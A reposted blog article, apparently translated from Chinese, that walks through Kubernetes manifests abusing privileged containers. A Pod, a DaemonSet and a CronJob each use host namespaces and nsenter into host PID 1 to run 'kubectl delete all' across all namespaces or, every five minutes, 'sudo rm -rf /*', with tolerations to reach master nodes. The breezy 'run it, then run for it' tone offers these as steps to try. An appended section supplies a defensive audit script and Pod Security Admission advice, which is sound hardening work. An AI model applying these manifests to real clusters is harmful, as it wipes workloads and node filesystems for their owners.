`rm -rf /` on Kubernetes: run it, then run for it
The following article is from 问其, Author 陈少文
Source | Reposted with permission from 问其 (ID: gh_717bb5f7c589)
Author | 陈少文
This document exists only to show how dangerous Docker privileged mode is. Handle with care.
1. Delete every resource directly
If you can log in to the machine, pack up your things and run:
kubectl delete all --all --all-namespaces
You may not have that much permission, though. In that case try the methods below; all of them rely on Docker's privileged mode.
2. A casual first try, to warm up
Warm up first: run the script, give it a go and see whether it has any effect.
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: danger-1
  namespace: default
spec:
  containers:
  - command: ["sh"]
    # nsenter joins the mount/UTS/IPC/net namespaces of host PID 1 (visible thanks to hostPID) and runs the piped command there
    args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
    image: docker.io/alpine:3.12
    name: pod-test
    securityContext:
      privileged: true
  # host namespaces: the pod shares the node's PID, network and IPC namespaces
  hostIPC: true
  hostNetwork: true
  hostPID: true
  tolerations:
  - effect: NoSchedule
    key: node-role.kubernetes.io/master
  - key: CriticalAddonsOnly
    operator: Exists
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 60
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 60
EOF
3. A Master node may have a kubeconfig configured
If kubectl cannot be run on the Node nodes, try steering the pod onto a Master node instead.
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  # distinct name: pod specs are immutable, so re-applying danger-1 with a new affinity would be rejected
  name: danger-2
  namespace: default
spec:
  affinity:
    nodeAffinity:
      # prefer (not require) nodes carrying the master role label
      preferredDuringSchedulingIgnoredDuringExecution:
      - preference:
          matchExpressions:
          - key: node-role.kubernetes.io/master
            operator: In
            values:
            - ""
        weight: 100
  containers:
  - command: ["sh"]
    args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
    image: docker.io/alpine:3.12
    name: pod-test
    securityContext:
      privileged: true
  tolerations:
  - effect: NoSchedule
    key: node-role.kubernetes.io/master
  - key: CriticalAddonsOnly
    operator: Exists
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 60
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 60
  hostIPC: true
  hostNetwork: true
  hostPID: true
EOF
4. Forget it, try every node
If that still does not work, just try every node; everything is packed up anyway.
cat <<EOF | kubectl apply -f -
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: danger-3
spec:
  selector:
    matchLabels:
      danger.kubernetes.io/name: d3
  template:
    metadata:
      labels:
        danger.kubernetes.io/name: d3
    spec:
      containers:
      - command: ["sh"]
        args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
        image: docker.io/alpine:3.12
        name: pod-test
        securityContext:
          privileged: true
      hostIPC: true
      hostNetwork: true
      hostPID: true
      # the tolerations let the DaemonSet schedule a pod on master nodes as well
      tolerations:
      - effect: NoSchedule
        key: node-role.kubernetes.io/master
      - key: CriticalAddonsOnly
        operator: Exists
      - effect: NoExecute
        key: node.kubernetes.io/not-ready
        operator: Exists
        tolerationSeconds: 60
      - effect: NoExecute
        key: node.kubernetes.io/unreachable
        operator: Exists
        tolerationSeconds: 60
EOF
5. One last struggle: put it on a schedule and clock out
By this point you will most likely still be back grinding 996 tomorrow, so one final attempt.
Run it every five minutes. The basic cron format is `* * * * *`, the five fields being minute, hour, day of month, month and day of week.
cat <<EOF | kubectl apply -f -
apiVersion: batch/v1beta1
kind: CronJob
metadata:
  name: danger-4
spec:
  schedule: "*/5 * * * *"
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - command: ["sh"]
            args: ["-c", "echo 'sudo rm -rf /*' | nsenter -t 1 -m -u -i -n"]
            image: docker.io/alpine:3.12
            name: pod-test
            securityContext:
              privileged: true
          restartPolicy: OnFailure
          hostIPC: true
          hostNetwork: true
          hostPID: true
          tolerations:
          - effect: NoSchedule
            key: node-role.kubernetes.io/master
          - key: CriticalAddonsOnly
            operator: Exists
          - effect: NoExecute
            key: node.kubernetes.io/not-ready
            operator: Exists
            tolerationSeconds: 60
          - effect: NoExecute
            key: node.kubernetes.io/unreachable
            operator: Exists
            tolerationSeconds: 60
EOF
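Every manifest above shares one shape: a privileged container, host PID/IPC/network namespaces, an `nsenter -t 1` into host PID 1, and tolerations that let it land on a master. The audit below, an added example that is not part of the original article, walks Pod, DaemonSet, Job and CronJob objects as `kubectl get ... -o json` returns them and reports exactly those traits; the embedded sample object is constructed to mirror the article's danger-1 pod.

```python
"""Flag workloads that can break out to the node via privileged mode plus host
namespaces. Feed it the "items" of `kubectl get pods,ds,cronjobs -A -o json`."""
import json

# Constructed sample: the article's danger-1 pod as the API server would return it.
SAMPLE_POD = json.loads("""
{"apiVersion": "v1", "kind": "Pod",
 "metadata": {"name": "danger-1", "namespace": "default"},
 "spec": {"hostPID": true, "hostNetwork": true, "hostIPC": true,
  "containers": [{"name": "pod-test", "image": "docker.io/alpine:3.12",
   "command": ["sh"],
   "args": ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"],
   "securityContext": {"privileged": true}}],
  "tolerations": [{"key": "node-role.kubernetes.io/master", "effect": "NoSchedule"}]}}
""")


def pod_spec(obj):
    """Return the pod spec: spec for a Pod, spec.template.spec for
    Deployment/DaemonSet/Job, spec.jobTemplate.spec.template.spec for CronJob."""
    spec = obj.get("spec", {})
    if obj.get("kind") == "CronJob":
        spec = spec.get("jobTemplate", {}).get("spec", {})
    if "template" in spec:
        spec = spec["template"].get("spec", {})
    return spec


def audit(obj):
    """Return a list of findings; an empty list means none of the escape traits are present."""
    spec = pod_spec(obj)
    findings = []
    for ns in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(ns):
            findings.append(f"{ns}=true")
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            findings.append(f"container {c['name']} is privileged")
        cmdline = " ".join(c.get("command", []) + c.get("args", []))
        if "nsenter" in cmdline and spec.get("hostPID"):
            findings.append(f"container {c['name']} runs nsenter with hostPID (host PID 1 reachable)")
    for t in spec.get("tolerations", []):
        if t.get("key") == "node-role.kubernetes.io/master":
            findings.append("tolerates the control-plane taint (may land on a master)")
    return findings


if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_POD)) or "no findings")
```

Pod Security Admission's `baseline` level already rejects privileged containers and host namespaces, so labelling a namespace with `pod-security.kubernetes.io/enforce: baseline` stops every manifest on this page at admission; the audit is for finding what is already running.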